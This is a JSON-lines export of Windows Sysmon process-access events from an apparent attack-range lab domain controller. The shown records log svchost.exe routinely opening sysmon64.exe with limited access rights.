{"EventTime":"2020-08-01 06:54:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4708,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:55.614\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:55.614","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4709,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:55.614\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:55.614","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4710,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:55.614\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:55.614","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4711,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:55.614\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:55.614","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4712,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:55.614\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:55.614","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4713,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:55.614\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:55.614","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4714,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:55.614\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:55.614","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:55","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4715,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:55.614\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:55.614","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
